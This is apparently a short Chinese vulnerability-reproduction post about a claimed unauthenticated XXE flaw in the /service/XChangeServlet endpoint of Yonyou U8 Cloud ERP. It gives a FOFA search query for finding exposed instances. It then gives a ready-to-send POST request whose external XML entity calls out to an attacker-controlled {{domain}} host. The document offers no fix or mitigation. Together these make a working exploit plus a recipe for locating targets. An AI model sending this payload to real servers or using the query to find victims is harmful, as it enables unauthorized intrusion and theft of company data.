0x01 产品简介

用友U8Cloud是用友推出的新一代云ERP，主要聚焦成长型、创新型企业，提供企业级云ERP整体解决方案。

0x02 漏洞概述

用友U8 cloud /service/XChangeServlet接口存在XXE漏洞，未授权的攻击者可通过此漏洞获取数据库敏感信息，从而盗取服务器数据，造成服务器信息泄露。

0x03 测绘语句

fofa: body="开启U8 cloud云端之旅"

0x04 漏洞复现

POST /service/XChangeServlet HTTP/1.1Host:Content-Type: text/xml<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://{{domain}}">]><r><a>&xxe;</a ></r>